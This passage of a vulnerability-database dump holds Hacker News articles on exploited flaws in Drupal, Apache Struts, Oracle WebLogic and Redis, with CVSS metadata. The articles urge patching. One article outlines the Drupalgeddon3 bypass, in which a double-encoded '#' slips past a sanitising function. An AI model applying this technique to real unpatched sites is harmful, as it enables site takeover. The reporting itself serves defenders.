"https://thehackernews.com/2018/08/apache-struts-vulnerability.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:40:35", "description": 
"[](<https://thehackernews.com/images/-nI78JCGBjaE/WuCp9Z3ptKI/AAAAAAAAwcQ/XnP5D9Is0Z4NbW1Yo0LuebQ2_RxM9oa9QCLcBGAs/s728-e100/drupal-patch-update.png>)\n\nDamn! You have to update your Drupal websites. \n \nYes, of course once again\u2014literally it's the third time in the last 30 days. \n \nAs [notified](<https://www.drupal.org/psa-2018-003>) in advance two days back, Drupal has now released new versions of its software to patch yet another critical remote code execution (RCE) vulnerability, affecting its Drupal 7 and 8 core. \n \nDrupal is a popular open-source content management system software that powers millions of websites, and unfortunately, the CMS has been under active attacks since the disclosure of a highly critical remote code execution vulnerability. \n \nThe new vulnerability was discovered while exploring the previously disclosed RCE vulnerability, dubbed **[Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>)** (CVE-2018-7600) that was patched on March 28, forcing the Drupal team to release this follow-up patch update. \n \nAccording to a new [advisory](<https://www.drupal.org/sa-core-2018-004>) released by the team, the new remote code execution vulnerability (CVE-2018-7602) could also allow attackers to take over vulnerable websites completely. \n \n\n\n### How to Patch Drupal Vulnerability\n\n[](<https://thehackernews.com/images/-zI_GNj80adw/WuC42gTf-5I/AAAAAAAAwcg/BiiIUAQK33MSqQwCkvfkyFi1l0BAq_wpACLcBGAs/s728-e100/drupal.png>)\n\n \nSince the previously disclosed flaw drew much attention and motivated attackers to target websites running on Drupal, the company has urged all website administrators to install the new security patches as soon as possible. 
\n\n\n * If you are running 7.x, upgrade to Drupal 7.59.\n * If you are running 8.5.x, upgrade to Drupal 8.5.3.\n * If you are running 8.4.x, which is no longer supported, you first need to update your site to the 8.4.8 release and then install the latest 8.5.3 release as soon as possible.\nIt should also be noted that the new patches will only work if your site has already applied the patches for the Drupalgeddon2 flaw. \n\n\n> \"We are not aware of any active exploits in the wild for the new vulnerability,\" a Drupal spokesperson told The Hacker News. \"Moreover, the new flaw is more complex to string together into an exploit.\"\n\nTechnical details of the flaw, which can be called **Drupalgeddon3**, have not been released in the advisory, but that does not mean you can wait until the next morning to update your website, believing it won't be attacked. \n \nWe have seen how attackers developed [automated exploits](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) leveraging the Drupalgeddon2 vulnerability to [inject cryptocurrency miners](<https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html>), backdoors, and other malware into websites, within a few hours after its details went public. \n \nBesides these two flaws, the team also patched a moderately critical [cross-site scripting (XSS) vulnerability](<https://thehackernews.com/2018/04/drupal-site-vulnerability.html>) last week, which could have allowed remote attackers to pull off advanced attacks including cookie theft, keylogging, phishing and identity theft. 
\n \nTherefore, Drupal website admins are highly recommended to update their websites as soon as possible.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-25T16:41:00", "type": "thn", "title": "Third Critical Drupal Flaw Discovered\u2014Patch Your Sites Immediately", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-04-26T11:04:51", "id": "THN:8E5D44939B2B2FF0156F7FF2D4802857", "href": "https://thehackernews.com/2018/04/drupal-vulnerability-exploit.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:36", "description": "[](<https://thehackernews.com/images/-zMSVUp45Ep4/WtcTP9bdJsI/AAAAAAAAwTg/e-HDb99w0307p9aEkp1TPTePjTvSe7JRQCLcBGAs/s728-e100/drupalgeddon-exploit.png>)\n\nThe Drupal vulnerability (CVE-2018-7600), dubbed [Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) that could allow attackers to completely take over vulnerable websites has now been exploited in the wild to deliver malware backdoors and cryptocurrency miners. 
\n \nDrupalgeddon2, a highly critical remote code execution vulnerability discovered two weeks ago in Drupal content management system software, was recently patched by the company without releasing its technical details. \n \nHowever, just a day after security researchers at Check Point and Dofinity published complete details, a Drupalgeddon2 proof-of-concept (PoC) [exploit code](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) was made widely available, and large-scale Internet scanning and exploitation attempts followed. \n \nAt the time, no incident of targets being hacked was reported, but over the weekend, several security firms noticed that attackers have now started exploiting the vulnerability to install cryptocurrency miner and other malware on vulnerable websites. \n \nThe SANS Internet Storm Center [spotted](<https://isc.sans.edu/forums/diary/A+Review+of+Recent+Drupal+Attacks+CVE20187600/23563/>) some attacks to deliver a cryptocurrency miner, a PHP backdoor, and an IRC bot written in Perl. \n\n\n[](<https://thehackernews.com/images/-cgGXAVXKeKc/WtcOhdYr0iI/AAAAAAAAwTQ/gXhXTplYR4oUU-jDAmOdEpSV_ZIIDPweACLcBGAs/s728-e100/drupal-website-hacking.png>)\n\nThe simple PHP backdoor allows attackers to upload additional files (backdoors) to the targeted server. \n \nA thread on SANS ISC Infosec forums also [suggests](<https://isc.sans.edu/forums/diary/Drupal+CVE20187600+PoC+is+Public/23549/>) that Drupalgeddon2 is being used to install the XMRig Monero miner on vulnerable websites. Besides the actual XMRig miner, the malicious script also downloads additional files, including a script to kill competing miners on the targeted system. 
\n \nResearchers from security firm Volexity have also [observed](<https://www.volexity.com/blog/2018/04/16/drupalgeddon-2-profiting-from-mass-exploitation/>) a wide variety of actions and payloads attempted via the public exploit for Drupalgeddon2 to deliver malicious scripts that install backdoors and cryptocurrency miners on the vulnerable sites. \n \nThe researchers believed that one of the Monero miner campaigns, delivering XMRig, is associated with a criminal group that exploited the vulnerability (CVE-2017-10271) in Oracle WebLogic servers to deliver cryptocurrency miner malware shortly after its PoC exploit code was made public in late 2017. \n\n\n[](<https://thehackernews.com/images/-cWUncg7VBfo/WtcN9yL7mTI/AAAAAAAAwTI/--A-g7ptWeIueY8TO5tvLWL1aijI9OAjgCLcBGAs/s728-e100/drupal-hacking.png>)\n\nVolexity identified some of the group's wallets that had stored a total of 544.74 XMR (Monero coin), which is equivalent to almost $105,567. \n \nAs we reported in our previous article, Imperva stats [showed](<https://www.imperva.com/blog/2018/04/drupalgeddon-2-0-are-hackers-slacking-off/>) that 90% of the Drupalgeddon2 attacks are simply IP scanning in an attempt to find vulnerable systems, 3% are backdoor infection attempts, and 2% are attempting to run crypto miners on the targets. \n \nFor those unaware, Drupalgeddon2 allows an unauthenticated, remote attacker to execute malicious code on default or common Drupal installations under the privileges of the user, affecting all versions of Drupal from 6 to 8. \n \nTherefore, site admins were highly recommended to patch the issue by updating their CMS to Drupal 7.58 or Drupal 8.5.1 as soon as possible. 
\n\n\n> In its advisory, Drupal [warned](<https://www.drupal.org/psa-2018-002>) that \"sites not patched by Wednesday, 2018-04-11 may be compromised\" and \"simply updating Drupal will not remove backdoors or fix compromised sites.\"\n\nMoreover, \n\n\n> \"If you find that your site is already patched, but you didn't do it, that can be a symptom that the site was compromised. Some attacks in the past have applied the patch as a way to guarantee that only that attacker is in control of the site.\"\n\nHere's a guide Drupal team suggest to follow [if your website has been hacked](<https://www.drupal.org/node/2365547>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-18T09:49:00", "type": "thn", "title": "Hackers Exploiting Drupal Vulnerability to Inject Cryptocurrency Miners", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271", "CVE-2018-7600"], "modified": "2018-04-18T09:50:03", "id": "THN:F03064A70C65D9BD62A8F5898BA276D2", "href": "https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": 
"2022-05-09T12:40:34", "description": "[](<https://thehackernews.com/images/-UXNjejbbqro/WuHDxyHAooI/AAAAAAAAwdM/yTGfiL9DknsnLaj9Z4dNy7xHoeZPrXinwCLcBGAs/s728-e100/drupal-hacking.png>)\n\nOnly a few hours after the Drupal team released the latest updates to fix a new remote code execution flaw in its content management system software, hackers have already started exploiting the vulnerability in the wild. \n \nAnnounced yesterday, the newly discovered vulnerability ([CVE-2018-7602](<https://thehackernews.com/2018/04/drupal-vulnerability-exploit.html>)) affects Drupal 7 and 8 core and allows remote attackers to achieve exactly what the previously discovered [Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) (CVE-2018-7600) flaw allowed\u2014complete takeover of affected websites. \n \nAlthough the Drupal team has not released any technical details of the vulnerability to prevent immediate exploitation, two individual hackers have revealed some details, along with a [proof-of-concept exploit](<https://pastebin.com/pRM8nmwj>) just a few hours after the patch release. \n \nIf you have been actively reading every latest story on The Hacker News, you must be aware of how the release of the [Drupalgeddon2 PoC exploit](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) drew much attention, which eventually allowed attackers to actively hijack websites and [spread cryptocurrency miners](<https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html>), backdoors, and other malware. \n \nAs expected, the Drupal team has warned that the new remote code execution flaw, let's refer to it as **Drupalgeddon3**, is now actively being exploited in the wild, again leaving millions of websites vulnerable to hackers. \n \nIn this article, I have summarized what this new flaw is all about and how attackers have been exploiting it to hack websites running unpatched versions of Drupal. 
\n\n\n[](<https://thehackernews.com/images/-aGyyaDhvYXI/WuHEwO_-DLI/AAAAAAAAwdU/brSU19-lJUkoC7LU-0YR1vh10h9gVLrLQCLcBGAs/s728-e100/drupal-exploit-code.png>)\n\n \nThe exploitation process of the Drupalgeddon3 flaw is somewhat similar to Drupalgeddon2, except that it requires a slightly different payload to trick vulnerable websites into executing the malicious payload on the victim's server. \n \nDrupalgeddon3 stems from improper input validation in the Form API, also known as \"renderable arrays,\" which renders metadata to output the structure of most of the UI (user interface) elements in Drupal. These renderable arrays are a key-value structure in which the property keys start with a hash sign (#). \n \nA Twitter user with the handle [@_dreadlocked](<https://twitter.com/_dreadlocked/status/989206562945273859>) explains that the flaw in the Form API can be triggered through the \"destination\" GET parameter of a URL that loads when a registered user initiates a request to delete a node; here, a \"node\" is any piece of individual content, such as a page, article, forum topic, or a post. \n \nSince this \"destination\" GET query parameter also accepts another URL (as a value) with its own GET parameters, whose values were not sanitized, it allowed an authenticated attacker to trick websites into executing the code. \n \nWhat I have understood from the PoC exploit released by another Twitter user, using the handle [@Blaklis_](<https://twitter.com/Blaklis_/status/989229547030794241?s=08>), is that the unsanitized values pass through the stripDangerousValues() function, which filters the \"#\" character, and that this can be abused by encoding the \"#\" character in the form of \"%2523\". \n \nThe function decodes \"%2523\" into \"%23,\" which is the Unicode version for \"#\" and will be processed to run arbitrary code on the system, such as a whoami utility. 
\n \nAt first, Drupal developers were skeptical about the possibility of real attacks using the Drupalgeddon3 vulnerability, but after the reports of in-the-wild attacks emerged, Drupal raised the level of danger of the problem to \"Highly critical.\" \n \nTherefore, all Drupal website administrators are highly recommended to update their websites to the latest versions of the software as soon as possible.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-26T12:32:00", "type": "thn", "title": "Release of PoC Exploit for New Drupal Flaw Once Again Puts Sites Under Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-04-26T12:32:45", "id": "THN:F8EDB5227B5DA0E4B49064C2972A193D", "href": "https://thehackernews.com/2018/04/drupalgeddon3-exploit-code.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-27T09:17:55", "description": "[](<https://3.bp.blogspot.com/-F7ViQ9JXvL8/Wbo_3TiAKWI/AAAAAAAAAJM/fsHVxS_O8ysIy4sZ2wdnG1OfLkiNJTjzgCLcBGAs/s1600/equifax-apache-struts.png>)\n\nThe [massive Equifax data 
breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) that exposed highly sensitive data of as many as 143 million people was caused by [exploiting a flaw in Apache Struts](<https://thehackernews.com/2017/03/apache-struts-framework.html>) framework, which Apache patched over two months before the security incident, Equifax has confirmed. \n \nCredit rating agency Equifax is yet another example of the companies that became victims of massive cyber attacks due to not patching a critical vulnerability on time, for which patches were already issued by the respective companies. \n \nRated critical with a maximum 10.0 score, the Apache Struts2 vulnerability (CVE-2017-5638) exploited in the Equifax breach was disclosed and fixed by Apache on March 6 with the release of Apache Struts version 2.3.32 or 2.5.10.1. \n \nThis flaw is separate from CVE-2017-9805, [another Apache Struts2 vulnerability](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) that was patched earlier this month, which was a programming bug that manifests due to the way the Struts REST plugin handles XML payloads while deserializing them, and was fixed in Struts version 2.5.13. \n \nRight after the disclosure of the vulnerability, hackers started actively exploiting the flaw in the wild to install rogue applications on affected web servers after its [proof-of-concept (PoC) exploit code](<https://thehackernews.com/2017/03/apache-struts-framework.html>) was uploaded to a Chinese site. \n \nDespite patches being available and proof that the flaw was already under mass attack by hackers, Equifax failed to patch its Web applications against the flaw, which resulted in the breach of personal data of [nearly half of the US population](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>). 
\n\n\n> \"Equifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cyber security firm to determine what information was accessed and who have been impacted,\" the company officials wrote in an [update on the website](<https://www.equifaxsecurity2017.com/>) titled \"A Progress Update for Consumers.\" \n\n> \"We [know that](<https://www.equifaxsecurity2017.com/2017/09/13/progress-update-consumers-4/>) criminals exploited a US website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\"\n\nCVE-2017-5638 was a then-zero-day vulnerability discovered in the [popular Apache Struts](<https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html>) web application framework by Cisco's threat intelligence firm Talos, which observed a number of active attacks exploiting the flaw. \n \nThe issue was a remote code execution bug in the Jakarta Multipart parser of Apache Struts2 that could allow an attacker to execute malicious commands on the server when uploading files based on the parser. \n \nAt the time, Apache warned it was possible to perform a remote code execution attack with \"a malicious Content-Type value,\" and if this value is not valid \"an exception is thrown which is then used to display an error message to a user.\" \n \n**Also Read: **[Steps You Should Follow to Protect Yourself From Equifax Breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) \n \nFor those unaware, Apache Struts is a free, open-source MVC framework for developing web applications in the Java programming language that run on both front-end and back-end Web servers. The framework is used by 65 per cent of the Fortune 100 companies, including Lockheed Martin, Vodafone, Virgin Atlantic, and the IRS. 
\n \nSince the hackers are actively exploiting the vulnerabilities in the Apache Struts web framework, Cisco has also [initiated an investigation](<https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html>) into its products against four newly discovered security vulnerabilities in Apache Struts2. \n \nOther companies that also incorporate a version of Apache Struts 2 should also check their infrastructures against these vulnerabilities. \n \nEquifax is currently offering free credit-monitoring and identity theft protection services for people who are affected by the massive data leak and has also enabled a security freeze for access to people's information. \n \nWhile the company was initially criticised for generating a PIN that was simply a time and date stamp and easy-to-guess, the PIN generation method was later changed to randomly generate numbers.\n", "cvss3": {}, "published": "2017-09-13T21:38:00", "type": "thn", "title": "Equifax Suffered Data Breach After It Failed to Patch Old Apache Struts Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-15T10:00:54", "id": "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "href": "https://thehackernews.com/2017/09/equifax-apache-struts.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-05-09T12:39:33", "description": "[](<https://thehackernews.com/images/-QjntPm-XQwU/XQqCA-uhRxI/AAAAAAAA0O4/orMmbHnGcYkUqJsHHXoCHD5yfnj6ayEQwCLcBGAs/s728-e100/oracle-weblogic-vulnerability.jpg>)\n\nOracle has released an out-of-band emergency software update to patch a newly discovered critical vulnerability in the WebLogic Server. \n \nAccording to Oracle, the vulnerability\u2014which can be identified as **CVE-2019-2729** and has a CVSS score of 9.8 out of 10\u2014is already being exploited in the wild by an unnamed group of attackers. 
\n \n**Oracle WebLogic** is a Java-based multi-tier enterprise application server that allows businesses to quickly deploy new products and services on the cloud, and is popular across both cloud and conventional environments. \n \nThe reported vulnerability is a deserialization issue via XMLDecoder in Oracle WebLogic Server Web Services that could allow unauthorized remote attackers to execute arbitrary code on the targeted servers and take control over them. \n \n\"This remote code execution vulnerability is remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password,\" the [advisory](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html>) said. \n \nIn a separate [note](<https://blogs.oracle.com/security/security-alert-cve-2019-2729-released>), the company also revealed that the flaw is related to a previously known deserialization vulnerability (**CVE-2019-2725**) in Oracle WebLogic Server that it patched in April this year. \n \nThe previously patched RCE flaw in Oracle WebLogic was also exploited by attackers as a zero-day, i.e., to distribute [Sodinokibi ransomware](<https://thehackernews.com/2019/05/ransomware-oracle-weblogic.html>) and [cryptocurrency mining malware](<https://thehackernews.com/2019/04/oracle-weblogic-hacking.html>). \n \nReported independently by a separate group of individuals and organizations, the new vulnerability affects Oracle WebLogic Server versions 10.3.6.0.0, 12.1.3.0.0, and 12.2.1.3.0. \n \nDue to the severity of this vulnerability, the company has recommended that affected users and companies install the available security updates as soon as possible. \n \n\n\n## Other Important Security Updates from Oracle\n\n \nBesides this, Cisco today also released several other software updates for various of its products to address some critical and high severity vulnerabilities. 
\n \n \n\n\n * [Cisco TelePresence](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190619-tele-shell-inj>) \u2014 a video conferencing system by Cisco, the software contains a high-severity vulnerability that could allow remote attackers to execute arbitrary shell commands or scripts on the targeted device just by sending crafted CDP packets to an affected device.\n * [Cisco SD-WAN Solution](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190619-sdwan-privesca>) \u2014 The vManage web-based interface of the software-defined WAN solutions by Cisco contains three flaws, two of which have been rated high in severity, and one is critical. Two of these allow an attacker to elevate his privileges to the root user, whereas one flaw could allow an authenticated, remote attacker to execute arbitrary commands with root privileges.\n * [Cisco Router Management Interface](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190619-rvrouters-dos>) \u2014 Cisco's RV110W, RV130W, and RV215W Routers contain a denial-of-service vulnerability that could allow an unauthenticated attacker to cause a reload of an affected device. Another, medium-severity flaw in this product could expose the list of devices that are connected to the guest network to remote attackers.\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-19T18:42:00", "type": "thn", "title": "New Critical Oracle WebLogic Flaw Under Active Attack \u2014 Patch Now", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725", "CVE-2019-2729"], "modified": "2019-06-19T19:12:22", "id": "THN:515CD17353FD69BC2811599574546F0A", "href": "https://thehackernews.com/2019/06/oracle-weblogic-vulnerability.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:25", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh09KugWf9Nll7KSG7yZBNIvMLXvLKZ92heAygg8X6PYa2oq5Gp7OARqFBSZyMbfZCsrcK9Mh72AhpOgxuEXhmjAynK6iRSEf_xMMAl_T0oqulTMyMrJgAc7PDPFVO0MuKFWRJessc_Iu5-Rm-QSXVXRVTrU_666K232IVvIKEiChh39TVtKy5BnyQY/s728-e100/redis.jpg>)\n\nMuhstik, a botnet infamous for propagating via web application exploits, has been 
observed targeting Redis servers using a recently disclosed vulnerability in the database system.\n\nThe vulnerability relates to [CVE-2022-0543](<https://nvd.nist.gov/vuln/detail/CVE-2022-0543>), a [Lua sandbox escape flaw](<https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce>) in the open-source, in-memory, key-value data store that could be abused to achieve remote code execution on the underlying machine. The vulnerability is rated 10 out of 10 for severity.\n\n\"Due to a packaging issue, a remote attacker with the ability to execute arbitrary Lua scripts could possibly escape the Lua sandbox and execute arbitrary code on the host,\" Ubuntu noted in an advisory released last month.\n\nAccording to [telemetry data](<https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers>) gathered by Juniper Threat Labs, the attacks leveraging the new flaw are said to have commenced on March 11, 2022, leading to the retrieval of a malicious shell script (\"russia.sh\") from a remote server, which is then utilized to fetch and execute the botnet binaries from another server.\n\nFirst [documented](<https://blog.netlab.360.com/gpon-exploit-in-the-wild-i-muhstik-botnet-among-others-en/>) by Chinese security firm Netlab 360, Muhstik is known to be [active](<https://www.lacework.com/blog/meet-muhstik-iot-botnet-infecting-cloud-servers/>) since March 2018 and is monetized for carrying out coin mining activities and staging distributed denial-of-service (DDoS) attacks.\n\nCapable of self-propagating on Linux and IoT devices like GPON home router, DD-WRT router, and [Tomato routers](<https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/>), Muhstik has been spotted weaponizing a number of flaws over the years \u2013\n\n * [**CVE-2017-10271**](<https://nvd.nist.gov/vuln/detail/cve-2017-10271>) (CVSS score: 7.5) \u2013 An input validation vulnerability in the Oracle WebLogic Server component of Oracle Fusion 
Middleware\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) \u2013 Drupal remote code execution vulnerability\n * [**CVE-2019-2725**](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) (CVSS score: 9.8) \u2013 Oracle WebLogic Server remote code execution vulnerability\n * [**CVE-2021-26084**](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>) (CVSS score: 9.8) \u2013 An OGNL (Object-Graph Navigation Language) injection flaw in Atlassian Confluence, and\n * [**CVE-2021-44228**](<https://thehackernews.com/2021/12/apache-log4j-vulnerability-log4shell.html>) (CVSS score: 10.0) \u2013 Apache Log4j remote code execution vulnerability (aka Log4Shell)\n\n\"This bot connects to an IRC server to receive commands which include the following: download files, shell commands, flood attacks, [and] SSH brute force,\" Juniper Threat Labs researchers said in a report published last week.\n\nIn light of active exploitation of the critical security flaw, users are highly recommended to move quickly to patch their Redis services to the latest version.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-28T06:59:00", "type": "thn", "title": "Muhstik Botnet Targeting Redis Servers Using Recently Disclosed Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271", "CVE-2018-7600", "CVE-2019-2725", "CVE-2021-26084", "CVE-2021-44228", "CVE-2022-0543"], "modified": "2022-03-28T06:59:18", "id": "THN:4DE731C9D113C3993C96A773C079023F", "href": "https://thehackernews.com/2022/03/muhstik-botnet-targeting-redis-servers.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:17", "description": "[](<https://thehackernews.com/images/-0qCTVNBbagI/YUmu3sDCBAI/AAAAAAAAD1k/k2oakh_7XAY6Wn7t1L57tvpGWxcFEF7iACLcBGAsYHQ/s0/php-malware.gif>)\n\nA recently discovered wave of malware attacks has been spotted using a variety of tactics to enslave susceptible machines 
with easy-to-guess administrative credentials to co-opt them into a network with the goal of illegally mining cryptocurrency.\n\n\"The malware's primary tactic is to spread by taking advantage of vulnerable systems and weak administrative credentials. Once they've been infected, these systems are then used to mine cryptocurrency,\" Akamai security researcher Larry Cashdollar [said](<https://www.akamai.com/blog/security/capoae-malware-ramps-up-uses-multiple-vulnerabilities-and-tactics-to-spread>) in a write-up published last week.\n\nThe PHP malware \u2014 codenamed \"Capoae\" (short for \"\u0421\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435,\" the Russian word for \"Scanning\") \u2014 is said to be delivered to the hosts via a backdoored addition to a WordPress plugin called \"download-monitor,\" which gets installed after successfully brute-forcing WordPress admin credentials. The attacks also involve the deployment of a [Golang binary](<https://www.virustotal.com/gui/file/7d1e2685b0971497d75cbc4d4dac7dc104e83b20c2df8615cf5b008dd37caee0/detection>) with decryption functionality, with the obfuscated payloads retrieved by leveraging the trojanized plugin to make a GET request from an actor-controlled domain.\n\n[](<https://thehackernews.com/images/-wFLrozAbkbI/YUmtp8WYEJI/AAAAAAAAD1c/NGDuAVPUzDcFWdqor6HQHxg5W4I9mYwEQCLcBGAsYHQ/s0/shell.jpg>)\n\nAlso included is a feature to decrypt and execute additional payloads, while the Golang binary takes advantage of exploits for multiple remote code execution flaws in Oracle WebLogic Server 